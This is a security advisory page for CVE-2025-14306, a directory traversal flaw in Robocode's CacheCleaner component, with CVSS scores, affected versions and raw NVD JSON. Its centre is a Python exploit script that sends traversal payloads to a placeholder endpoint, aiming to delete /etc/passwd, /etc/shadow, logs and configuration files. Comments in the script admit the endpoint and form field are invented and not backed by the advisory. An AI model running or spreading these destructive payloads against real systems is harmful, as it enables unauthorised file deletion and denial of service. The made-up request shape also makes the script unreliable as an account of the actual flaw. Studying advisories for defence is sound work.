Security Vulnerability Report
CVE-2025-14306 CVSS 9.1 CRITICAL

CVE-2025-14306

Published: 2025-12-09 16:17:38
Last Modified: 2026-01-28 20:16:08

Description

A directory traversal vulnerability exists in the CacheCleaner component of Robocode version 1.9.3.6. The recursivelyDelete method fails to properly sanitize file paths, allowing attackers to traverse directories and delete arbitrary files on the system. This vulnerability can be exploited by submitting specially crafted inputs that manipulate the file path, leading to potential unauthorized file deletions. https://robo-code.blogspot.com/

CVSS Details

CVSS Score
9.1
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:robocode:robocode:1.9.3.6:*:*:*:*:*:*:* - VULNERABLE
Robocode < 1.9.3.6 (CacheCleaner组件所有版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import urllib.parse  # NOTE(review): imported but never used in this script

# CVE-2025-14306 PoC - Directory Traversal in Robocode CacheCleaner
# Target: Robocode 1.9.3.6 CacheCleaner Component
#
# NOTE(review): the advisory text on this page describes a path-sanitisation
# flaw in the CacheCleaner.recursivelyDelete method and its only references
# are a GitHub pull request and a fix commit; no HTTP endpoint, port, or
# request parameter is named anywhere in the advisory. The URL below and the
# `path` form field are therefore assumptions of this script, not facts taken
# from the advisory — confirm against the referenced fix before treating this
# request shape as the real attack surface.
#
# Defensive context (CWE-22, as listed in the page's weakness data): the
# underlying class of bug is fixed by canonicalising the requested path
# (resolving `..` and symlinks) and rejecting it unless the result still lies
# inside the cache root. From a detection standpoint, path strings containing
# `../` sequences reaching a delete routine are the signal to alert on.

# Endpoint this script posts to. Placeholder host; see the note above on why
# this endpoint is not established by the advisory.
TARGET_URL = "http://target:8080/cacheclean"


def exploit_directory_traversal():
    """
    Exploit the directory traversal vulnerability in CacheCleaner recursivelyDelete method.
    This PoC demonstrates how to delete arbitrary files outside the cache directory.

    Sends one POST per entry in ``payloads`` to ``TARGET_URL`` with the
    traversal string in the ``path`` form field and prints the HTTP status of
    each reply. Returns nothing; all results go to stdout. Network errors are
    caught per payload and printed rather than raised.
    """
    # Payload to delete /etc/passwd using path traversal
    # The ../ sequences will traverse up from the cache directory to system root
    # NOTE(review): this variable is never read; the loop below uses `payloads`.
    malicious_path = "../../../../../../etc/passwd"

    # Alternative payloads for different targets
    # NOTE(review): the relative depth (number of `../`) assumes a particular
    # location of the cache directory, which the advisory does not state.
    payloads = [
        "../../../../../../etc/passwd",  # Delete system passwd file
        "../../../../../../var/log/app.log",  # Delete application logs
        "../../../config/database.yml",  # Delete configuration files
        "../../../../../../etc/shadow",  # Attempt to delete shadow file
    ]

    for payload in payloads:
        try:
            # Send malicious request to CacheCleaner endpoint
            response = requests.post(
                TARGET_URL,
                data={'path': payload},
                timeout=10
            )
            print(f"[*] Sent payload: {payload}")
            print(f"[*] Response status: {response.status_code}")
            # A 200 only shows the request was accepted; nothing here verifies
            # that any file was actually removed, which is why the messages
            # below are phrased as "may have been".
            if response.status_code == 200:
                print(f"[!] File deletion request sent successfully")
                print(f"[!] Target file may have been deleted")
            else:
                print(f"[*] Request failed or blocked")
        # Connection failures, timeouts and similar are reported and the loop
        # continues with the next payload.
        except requests.exceptions.RequestException as e:
            print(f"[!] Error: {e}")


if __name__ == "__main__":
    print("CVE-2025-14306 - Robocode CacheCleaner Directory Traversal PoC")
    print("=" * 60)
    exploit_directory_traversal()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-14306", "sourceIdentifier": "[email protected]", "published": "2025-12-09T16:17:38.477", "lastModified": "2026-01-28T20:16:08.177", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A directory traversal vulnerability exists in the CacheCleaner component of Robocode version 1.9.3.6. The recursivelyDelete method fails to properly sanitize file paths, allowing attackers to traverse directories and delete arbitrary files on the system. This vulnerability can be exploited by submitting specially crafted inputs that manipulate the file path, leading to potential unauthorized file deletions. https://robo-code.blogspot.com/"}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:Y/R:U/V:D/RE:M/U:Red", "baseScore": 10.0, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "HIGH", "subIntegrityImpact": "HIGH", "subAvailabilityImpact": "HIGH", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": 
"NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "YES", "Recovery": "USER", "valueDensity": "DIFFUSE", "vulnerabilityResponseEffort": "MODERATE", "providerUrgency": "RED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:robocode:robocode:1.9.3.6:*:*:*:*:*:*:*", "matchCriteriaId": "838ABFF5-2DF6-4A7E-933B-179FB2FC1AE0"}]}]}], "references": [{"url": "https://github.com/robo-code/robocode/pull/67", "source": "[email protected]", "tags": ["Issue Tracking", "Vendor Advisory"]}, {"url": "https://github.com/robo-code/robocode/commit/26b6ba8ed5b2a11a646ce2d5da8d42cd53574b1f", "source": "af854a3a-2127-422b-91ae-364da2661108"}]}}